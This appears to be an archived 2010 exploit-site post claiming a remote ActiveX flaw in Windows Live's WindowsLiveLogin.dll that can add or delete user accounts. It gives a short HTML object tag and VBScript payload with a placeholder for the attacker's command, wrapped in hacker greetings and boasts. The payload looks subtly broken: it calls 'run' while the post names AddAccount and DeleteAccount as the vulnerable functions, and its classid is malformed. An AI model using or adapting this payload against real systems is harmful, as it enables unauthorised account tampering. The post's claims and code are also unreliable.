Windows live msn (V 2009 build 14.0.8117.416) ActiveX ADD &a
Posted on 29 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Windows live msn (V 2009 build 14.0.8117.416) ActiveX ADD & delete user</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================================================= Windows live msn (V 2009 build 14.0.8117.416) ActiveX ADD & delete user ======================================================================= ########################{In The Name Of Allah The Mercifull}######################? # Title : Windows live msn (V 2009 build 14.0.8117.416) (WindowsLiveLogin.dll) 0day suffer from ActiveX Remote ADD & delete user× # Tested : Windows xp (sp3) ## ## Author : R3d-D3v!L <X[at]hotmail.co.jp> # Credits to : XP10_HACKER ((xp10.com)) ## ## Greetz : DOLLY-MERNA & DR_DAShER & JUPA & hetlar jaddah& Abo-ShA@D ## ## ## all member at XP10.com ## ######################################################## ## infected bath : :Program FilesCommon FilesMicrosoft SharedWindows LiveWindowsLiveLogin.dll infected Function : AddAccount ( ByVal bstrAccountName As String , ByVal bstrPassword As String , ByVal iOption As Long ) & Sub DeleteAccount ( ByVal bstrAccountName As String ) in (AddAccount&DeleteAccount) in IIDBHOCtrl < br>EXPLO!T: <html> </font></b></p> <p> <object classid='D2517915-48CE-4286-970F-921E881B8C5C' id='target' ></object> <script language='vbscript'> arg1=" TYPE YOUR EV!L add or del account code× " target.run arg1 </script></p> [~]-----------------------------{((MAGOUSH-87))}--------------------------- ---------------------# # [~] Greetz tO: [dolly &MERNA &DEV!L_MODY &po!S!ON Sc0rp!0N &JASM!N &MARWA & mAG0ush-1987] # # [~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ # # [~] spechial thanks : ((HITLER JEDDAH & abo-shahd & DR.DAShER & abo-hlil)) # # [?]spechial SupP0RT : MY M!ND # ? Offensive Security # # [~]spechial FR!ND: JUPA # # [~] !'M 4R48!4N 3XPL0!73R. # # < br> [~]{[(D!R 4ll 0R D!E)]}; # # [~]------------------------------------------------------------------------ --------------------- # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-29]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>